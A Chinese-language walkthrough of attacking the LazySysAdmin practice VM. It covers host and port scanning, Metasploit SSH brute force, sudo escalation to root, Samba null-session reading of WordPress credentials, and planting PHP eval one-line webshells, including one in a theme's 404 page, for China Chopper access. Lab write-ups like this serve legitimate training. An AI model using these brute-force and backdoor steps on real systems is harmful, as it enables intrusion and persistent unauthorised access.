lazysysadmin靶机练习

一、实验环境1.靶机：Lazysysadmin

2.测试机：Kali

3.帮凶机：Windows 10

4.扫描工具：Nesssus

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

二，这里我们分为2种方式来实验

1、用字典来爆破连接

2、用木马来连接

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2.1(第一种字典爆破)

（1）信息收集

查询测试机ip地址，判断所处网段

测试机所处网段 192.168.0.0

（2）主机发现

root@akemi:~# netdiscover -i eth0 -r 192.168.0.0/24

参数说明

-i 指定网卡名
-r 指定网段

（3）端口扫描（masscan/nmap）

root@akemi:~# masscan --rate=10000 --ports 0-65535 192.168.0.99

masscan扫描速度快，但准确度不高，可以多扫几次，以防漏扫

或者使用nmap

root@akemi:~# nmap -sV -T4 -p 6667,22,139,445,80,3306 192.168.0.99

namp：-T4（分为0-5等级；-sV（版本信息与开启服务）；-A（详细扫描开放的端口的具体服务）

与masscan相比，namp更详细，但是速度较慢（可以先使用masscan扫描出端口，再用nmap详细扫描开放的端口)

开启了6667（ircd 互联网中继聊天守护进程），22（ssh服务），139、445（smaba共享服务），80（Apache服务），3306（MySQL）端口

（4）漏洞扫描

开启nessusd服务，

如果没有安装点击这里

root@akemi:~# /etc/init.d/nessusd restart

登录nessusd服务（本地的8834端口）

选择“我的扫描”>>“新建扫描”

选择“进阶扫描”

（5）ssh爆破（22端口）

原理：靶机用户存在弱口令漏洞，利用枚举的方法破解目标主机ssh服务（使用Metasploit）

5.1)启动msfconsole

5.2)搜索ssh_login的相关工具和攻击负载

search ssh_login

5.3)启用漏洞模块，并查看需要的设置的相关项

use auxiliary/scanner/ssh/ssh_login

show options

5.4)设置目标主机的IP地址

set rhosts 192.168.0.99

5.5)设置登录用户的用户文件(这里我提前写好文件了

set user_file /root/user.txt

5.6(设置暴力破解的密码问价路径

5.7)开始向目标主机爆破ssh的登录账号和密码

exploit

5.8)远程连接目标主机

ssh [email protected]

5.9）终极三问

whoami———>pwd———>uname -a

5.10）查询/etc/passwd文件权限

ls -l /etc/passwd

/etc/passwd仅root拥有可读可写权限，togie只拥有可读权限

5.11）查看当前用户togie允许命令的权限信息

sudo -l

togie用户在本机上允许命令的权限为所有

groups

togie用户所在组为：sudo

5.12）提权（获取root权限）

sudo su root

5.13）上传后门文件（一句话木马）

后门文件（一句话木马），可以多放几个在不同目录（必须是在/var/www/html目录下），使用不同文件名（隐藏深点）

也可以使用webacoo工具自动生成一句话木马（webacoo -g -o 1.php）

<?php @eval($_POST[a])?>

5.14)启用中国菜刀，获取webshell权限（后门测试）

只要后门没有被清除，都可以用菜刀为所欲为

二、web测试

1.通过浏览器访问http://192.168.0.99 , 分析整个网页发现没啥东西

用默认目录扫描工具(dirb），扫描对应网站的目录

dirb 192.168.0.99

3、对扫描出来的目录进行分析

扫描出来info.php文件，浏览器访问,下图可以看到目标存在信息泄露漏洞

4.扫描出来/phpmyadmin/目录，浏览器访问,可以看到是mysql的后台登录界面,尝试弱口令或者暴力破解

5扫描发现wordpress ,浏览器访问，发现其中含有疑似用户名的信息

6尝试登录wordpress的默认后台管理页面wp-login.php

7.尝试输入一些简单的弱口令,提示如下错误信息,发现用户名是admin,此处存在用户名名枚举漏洞,然后尝试暴力破解密码

补充：

使用wpscan扫描http://192.168.0.99/wordpress 看是否含有漏洞
Vp 只枚举有漏洞的插件，vt只枚举存在漏洞的主题，tt列举缩略图相关的文件
因为是WordPress博客的，所以可以使用wpsan进行漏洞扫描

wpscan --url http://192.168.0.99/wordpress -e vp,vt,tt

4、尝试从samba服务发现漏洞

使用enum4linux枚举运行samba的主机信息
enum4linux 192.168.106.140

扫描完成后发现存在共享目录，允许空口令

可以远程挂载，查看共享目录,发现共享的是网站的根目录

mount -t cifs -o username=’’,password=’’ //192.168.0.99/share$ /mnt

Cd到wordpress目录,查看配置文件,可以看到wordpress后台的用户名以及密码

或者在windows访问共享

访问方法：\\192.168.0.99\share$\wordpress

用得到用户名与密码尝试登录phpmyadmin,成功登录进去

尝试查看数据,发现此账户对数据库没有任何权限

尝试用数据库的用户名密码登录wordpress后台,成功登录

可以在一个404页面中添加一句话木马留后门,上传这个404页面

<?php @eval($_POST[b]);?>

在浏览器访问一个不存在的页面,可以看到跳转到404页面,这时也就执行了插入其中的一句话木马

打开菜刀工具,连接url, 成功反弹shell，经测试发现就下图的菜刀可以连接成功，其余菜刀不可以

总结

1.信息收集
判断网段
主机发现
端口扫描
1.1漏洞扫描
1.2开启nessusd服务，加载插件，登录
1.3.建立扫描
1.4.扫描结果
2.dirb目录爆破
默认字典目录扫描
指定字典目录扫描
3.ssh爆破（msfconsole）
4.wpscan扫描wordpress漏洞
5.文件共享信息泄露
6.进入后台，Appearance页面404.php挂马，菜刀连接，反弹shell